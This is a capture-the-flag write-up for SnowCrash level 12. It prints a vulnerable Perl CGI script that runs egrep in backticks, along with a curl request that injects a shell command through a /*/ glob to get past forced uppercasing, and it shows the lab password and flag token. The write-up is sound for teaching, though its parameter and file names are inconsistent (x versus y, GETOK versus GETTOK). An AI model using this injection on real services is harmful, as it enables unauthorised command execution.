| .. | ||
| flag | ||
| passwd | ||
| README.md | ||
Level 12
how to login
username: level12
password: fa6v5ateaw21peobuub8ipe6s
Goal
run getflag as user flag12
Actually doing something
level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl*
-r-x------ 1 level12 level12 675 Apr 3 2012 .profile*
Perl again...
level12@SnowCrash:~$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$nn = $_[1];
$xx = $_[0];
$xx =~ tr/a-z/A-Z/;
$xx =~ s/\s.*//;
@output = `egrep "^$xx" /tmp/xd 2>&1`;
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $nn) {
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y")));
a bit more involed, lets try to make it more pretty
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$arg2 = $_[1];
$arg1 = $_[0];
$arg1 =~ tr/a-z/A-Z/;
$arg1 =~ s/\s.*//;
@output = `egrep "^$arg1" /tmp/xd 2>&1`;
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $arg2) {
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y")));
when looking at this, we basically spot an egrep meaning that we have a shell injection.
lets look at what is given to this string
first of all, we get called with two argument, lets call them by their http parameter names x and y
in the script they are also named arg1 for x and arg2 for y
arg2 doesn't matter for us, so lets ignore it
arg1 is converted to uppercase, and then we only keep erverything up to the first space;
so we want to execute something like last time, meaning that we want to instert something to stop the current comment
";cmdhere
but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is /tmp which is in lowercase...
Alas this doesnt matter since we are in shell land, and we can say /*/GETOK to refer to the /tmp/GETOK script
level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr